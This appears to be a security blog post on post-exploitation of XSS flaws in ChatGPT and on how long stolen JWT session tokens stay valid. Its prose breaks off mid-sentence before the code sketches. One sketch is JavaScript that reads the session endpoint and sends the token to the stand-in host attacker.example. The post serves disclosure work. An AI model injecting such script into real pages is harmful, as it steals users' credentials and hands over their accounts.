API Security Blog

From ChatBot To SpyBot: ChatGPT Post Exploitation

In the second installment of our blog post series on ChatGPT, we delve deeper into the security implications of integrating AI into our daily routines. Building on the discoveries shared in our initial post, "XSS Marks the Spot: Digging Up Vulnerabilities in ChatGPT," where we uncovered two Cross-Site Scripting (XSS) vulnerabilities, we now explore the potential for post-exploitation. This examination focuses on how attackers could exploit OpenAI's ChatGPT to gain persistent access to user data and manipulate application behavior.

The Problem with XSS on ChatGPT

In the previous post, we demonstrated how a threat actor could use an XSS vulnerability to exfiltrate the response from /api/auth/session and retrieve the user's JWT access token. This token works across most ChatGPT API endpoints, with the notable exception of /api/auth/session itself. That restriction prevents permanent access to accounts with leaked access tokens, whether the leak came from an XSS attack or some other vulnerability. Once a threat actor holds your JWT token, however, they can do almost anything on your account: exfiltrate all your historical conversations or initiate new ones.

It is important to highlight that the JWT access token issued by the /api/auth/session endpoint is valid for only about two and a half days. This limited validity period significantly reduces a threat actor's ability to maintain persistent access to compromised accounts, since the attacker would have to…
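To make the exfiltration pattern described above concrete, here is a minimal sketch of the shape such an injected script could take. To keep it runnable outside a browser, the fetch and beacon primitives are injected as parameters; in a real XSS payload they would be window.fetch and navigator.sendBeacon. The collector URL, the accessToken field name, and the demo token value are all hypothetical, for illustration only.

```javascript
// Sketch: an injected script reads the session endpoint (sent with the
// victim's cookies) and forwards the returned token to an
// attacker-controlled collector. fetchFn/beaconFn are injected so the
// sketch can run without a browser.
async function exfiltrateSessionToken(fetchFn, beaconFn) {
  const res = await fetchFn("/api/auth/session", { credentials: "include" });
  const session = await res.json();
  // "accessToken" as the field name is an assumption for this sketch.
  beaconFn("https://attacker.example/collect", session.accessToken);
  return session.accessToken;
}

// Stubbed demonstration with a fake fetch and an in-memory "beacon":
const fakeFetch = async () => ({ json: async () => ({ accessToken: "tok_demo" }) });
const sent = [];
exfiltrateSessionToken(fakeFetch, (url, data) => sent.push([url, data]))
  .then((tok) => console.log(sent.length, tok)); // prints: 1 tok_demo
```

The same pattern works with any sink the page allows (an image request, a form post, etc.); sendBeacon is just one common, fire-and-forget choice.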
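The roughly two-and-a-half-day validity window can be seen directly in the token itself: JWTs carry their issued-at (iat) and expiry (exp) claims in a base64url-encoded payload that anyone holding the token can decode without the signing key. Below is a short sketch that decodes such a payload; the token here is hand-built for illustration, and whether OpenAI's session token uses exactly these claim names is an assumption.

```javascript
// Decode the (unverified) payload segment of a JWT. This does NOT
// validate the signature; it only inspects the claims.
function jwtPayload(token) {
  const payloadB64 = token.split(".")[1];
  return JSON.parse(Buffer.from(payloadB64, "base64url").toString("utf8"));
}

// Hypothetical token whose iat/exp claims are 2.5 days
// (216,000 seconds) apart, mirroring the lifetime described above.
const b64 = (obj) => Buffer.from(JSON.stringify(obj)).toString("base64url");
const iat = 1700000000;
const token = `${b64({ alg: "HS256" })}.${b64({ iat, exp: iat + 216000 })}.sig`;

const p = jwtPayload(token);
console.log((p.exp - p.iat) / 86400); // → 2.5
```

An attacker who steals a token can read exp the same way and know exactly how long their window of access lasts, which is why the short lifetime matters for limiting post-exploitation persistence.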
